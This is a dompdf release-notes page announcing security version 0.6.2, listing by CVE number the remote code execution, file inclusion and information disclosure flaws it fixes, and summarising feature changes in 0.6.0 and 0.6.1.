PHP remote file inclusion vulnerability in dompdf.php

This release is superseded by version 0.7.0 This is a security-focused release that addresses a number of vulnerabilities that can expose your system to exploitation. In tandem with this release we have also posted a document to the wiki with advice for securing dompdf. Please read the new document and take appropriate measures to protect your systems. We urge all users to upgrade to this release if you are using dompdf 0.6.1 or earlier. Change Summary for 0.6.2 This update addresses the following announced vulnerabilities: Vulnerability Reference Type Severity Remote Code Execution (complement of CVE-2014-2383) CVE-2014-5013 Remote Code Execution Low; Critical (depending on configuration) Denial Of Service Vector CVE-2014-5012 Information Disclosure Medium Information Disclosure CVE-2014-5011 Information Disclosure Medium Arbitrary file read in dompdf using PHP stream filters CVE-2014-2383 Information Disclosure Medium Change Summary for 0.6.1 Removed pre-processing of PHP code when DOMPDF_ENABLE_PHP is true (this does not affect embedded script). Prior to this release dompdf was vulnerable to an information disclosure vulnerability. Thanks to Portcullis Computer Security Ltd. for reporting the issue. See the security advisory for additional details: Arbitrary file read in dompdf. This update addresses the following announced vulnerabilities: Vulnerability Reference Type Severity Arbitrary file read in dompdf using PHP stream filters CVE-2014-2383 Information Disclosure Medium PHP remote file inclusion vulnerability in dompdf.php CVE-2010-4879 Remote File Inclusion Low; Critical (depending on configuration) Change Summary for 0.6.0 Fonts: Full Unicode support (with embedded fonts); DejaVu fonts pre-installed; php-font-lib now provides font handling and sub-setting CSS: float support, border radius, transparency, @page, @font-face, generated content, fixed-positioning, transformations HTML: HTML5 Parser cleans your HTML syntax Images: Expanded image handling (including alpha transparency); added support for Data-URI image sources Performance improvements The project is now hosted on GitHub (the Google Code project is being temporarily maintained). Download Instructions Click the link labeled “dompdf-0.6.2.zip” to download the packaged release. The two buttons labeled “Source code” are auto-generated by github and do not include all the necessary files.